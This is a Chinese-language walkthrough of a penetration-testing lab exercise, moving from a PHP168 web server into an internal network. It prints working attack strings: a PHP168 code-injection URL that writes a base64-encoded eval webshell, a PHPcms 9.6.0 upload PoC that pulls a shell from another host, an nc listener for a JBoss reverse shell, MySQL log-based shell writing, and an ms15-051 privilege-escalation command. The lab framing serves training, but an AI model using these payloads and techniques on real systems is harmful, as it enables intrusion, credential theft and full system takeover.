渗透测试到内网综合练习

使用 工具 扫描端口：

端口分别为8081、999、3389 、3306，端口8081即网站web服务，端口999为phpmyadmin后台地址。

访问 8081 端口：

图标告诉我们这是一个 php 168，既然放出来这个cms，这个cms 必然是有漏洞的。

我们可以 搜集该程序在网上已知的漏洞信息。

漏洞链接:

https://www.secpulse.com/archives/21707.html

这篇文章的漏洞点在login.php文件中,但是目标网站并没有该文件，所以测试失败了。

我们试试其他的已知漏洞。

第二篇漏洞文章介绍：

https://www.secpulse.com/archives/6663.html

注册会员访问这个漏洞地址：

/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job= endHTML

看到漏洞是存在的，我们把执行的代码换成生成一句话木马的代码:

http://192.168.15.54:8081/member/post.php?only=1&aid=1&job=endHTML&showHtml_Type[bencandy][1]={${fwrite(fopen(base64_decode(%27eC5waHAg%27),%27w%27),base64_decode(%27PD9AZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4g%27))%20and%20print(%27ok%27)}}

执行成功会在当前目录生成一个x.php 一句话文件。

访问x.php文件是存在的,我们 打开菜刀连接。

查看是否执行cmd。

竟然有

325个补丁， 意味着exp成功率很低了。只能调整思路,前面得到的信息phpmyadmin还没有拿到密码，现在可以从数据库配置文件中找到密码尝试登陆。

成功登录，

有了mysql ，那就尝试udf提权。

成功执行。

然而事情并没有那么简单，在执行添加用户的时候 net 无法使用，只能查找利用无net添加账户的办法。

信息收集方式与前面相同，这里就不赘述了。直接 访问该目标:

是一个通达oa系统，下面是相关漏洞链接：

https://www.secpulse.com/archives/24591.html

这个漏洞需要进入后台操作，但是我们没有账户，尝试搜索一下注入的漏洞，发现都是需要登陆。暴力破解和手动猜解密码都不可行。

结果无意中输入了admin，密码填都不用填就登陆成功了。

还是很幸运的~

上方漏洞介绍表明是利用上传图片马进行文件包含，找到一处上传点。

这里不是直接引用图片地址，而是调用参数获取，意味着真实路径找不到了。只能再仔细分析url：

http://192.168.15.53:8088/inc/attach_old.php?ATTACHMENT_ID=photo&ATTACHMENT_NAME=1.jpg&DIRECT_VIEW=1

通过路径看url，猜想会不会是 photo/attachment/1.jpg。

我们试试。

显然不是，我们再换一下位置

attachment/photo/1.jpg

访问出现403，证明这个文件存在。说明我们把路径猜对了（心里开心下）

那么我们可以直接进行文件包含。

文件包含成功， 连接菜刀。

显示未登录，直接在菜刀里登陆。

菜刀连接还是出现报错。

确认菜刀问题，更换另外的版本就可以了。

成功连接。

存在四个补丁，这里利用普通的提权工具便能提权成功了。

下面进行内网渗透的过程。

内网渗透

发现有10段ip，使用 ew工具转发，通过对之前的端口收集情况，尝试扫描999、8088、8081、8008等端口。

发现ip  10.12.1.2，10.12.1.3 ，10.12.15，访问10.12.1.2 。

发现是个jboss，在网上找了许多exp利用工具，最后发现一款工具可以使用，

工具下载地址：

http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip

本地nc监听: nc -lvvp 3666 

利用工具反弹shell。

成功利用。

找到一个root文件 ，里面的内容为: aHV3ZWlza ，暂且先记着。

接下来访问10.12.1.3。

是一个phpcms系统，刚好上个礼拜试验过：

PHPcms9.6.0 最新版任意文件上传漏洞（直接getshell）

poc如下：

siteid=1&modelid=11&username=test123456&password=test676676&email=test56566@qq.com&info[content]=<img src=http://10.12.1.2/1.txt?.php#.jpg>&dosubmit=1&protocol=

其中:http://10.12.1.2/1.txt

文件需要自己创建且目标机器能访问的资源,内容为一句话木马。

shell地址:

http://10.12.1.3/uploadfile/2018/0628/20180628113055384.php

打开菜刀连接。

虚拟终端查看权限发现是system ，可以添加用户直接登陆远程桌面。

登陆之后和目标机器2一样,找找线索...

找到一个文件里面存在奇怪的密码 ：GVuLmNvbQ== 

到这里整理一下收集到的线索:

10.12.12  ==> aHV3ZWlza

10.12.1.3 ==> GVuLmNvbQ== 

看着是不是很熟悉，base64加密，先组合解密一下。

得到 huweishen.com  , 难道还是mysql的密码？

根据上次实验，这个应该就是10.12.1.5 的mysql密码

内网目标:10.12.1.5

打开 10.12.1.5 ，是一个静态页面，在开始内网扫描的时候发现开了几个端口。

习惯性的目录扫描一下:

结果发现10.12.1.5:999 和10.12.1.5/phpmyadmin 是同一个phpmyadmin登陆页面,

试了弱口令和爆破,都没有成功。(字典太弱了)

这个时候想起之前解密出来的一个密码：huweishen.com，尝试了一下果然登陆成功。

拿到mysql权限,下一步肯定日志写webshell,udf提权。 在这之前先看看mysql 的安装路径。

利用select @@basedir; 查询到路径为:

C:/Huweishen.com/PHPWEB/MySQL Server 5.5，

是护卫神的环境, 接下来就是拿 shell 了, 但是遇到了一个问题就是没有拿到网站的路径。在网上看了一下护卫神的网站目录(默认是d:\wwwroot\xxx),但是试着写入,以失败告终。

这个地方卡住了, 就在准备放弃的时候,想到一个办法!

就是现在能访问phpmyadmin ，为何不把shell文件放到phpmyadmin目录呢,行动起来。

该怎么找phpmyadmin的目录呢?

下载一个护卫神本地安装一下,可以看到 phpmyadmin 默认的路径是这个:

C:\Huweishen.com\PHPWEB\phpmyadmin\web 

找到路径就可以写入了, 还是利用日志写入的方式,在写shell之前先写入一个测试文件。

可以访问：

按照上面的步骤操作, 成功拿到shell(地址:http://10.12.1.5:999/shell.php)!

拿到shell 发现 cmd 不能执行命令。

根据经验,我们换个别的木马试一下, asp,aspx ......发现还支持aspx的,于是就使用了aspx的木马。

cmd还是不能运行....

在我翻看资源文件的时候发现里面有ftp ,这让我想到  serv-u....

于是我就找了软件安装目录,果然有...

找到配置文件,看到里面加密的密码....

解出密码 123

密码不对，无法连接，只能继续寻找， 一定有正确的配置文件...

存在一个配置文件的副本,打开发现 password的加密值是不一样的,先解密看看。

解密得到 gongxifacai  。

命令执行成功,,,但是没有回显,把命令执行的结果储存到一个文本中就可以了!

whoami 的结果是一个低权限的账户,但只要能执行cmd命令就好办!

systeminfo查看系统信息发现补丁就打了两个，这下应该可以用exp了。

利用提权辅助找到可以用的exp...来看看效果,, 

执行:

cmd.exe /c C:\Huweishen.com\PHPWEB\phpmyadmin\web\ms15-051x64.exe "whoami" > C:\Huweishen.com\PHPWEB\phpmyadmin\web\2.txt

拿到system权限！剩下的就简单啦~

到了这里此次渗透测试练习终于完成了。

总结

1. 根据已知的程序或中间件名称来在网上寻找公开的利用漏洞信息。

2. 在本机模拟目标机器的环境往往会获得一些有用的信息，了解目标才更容易成功的渗透进去。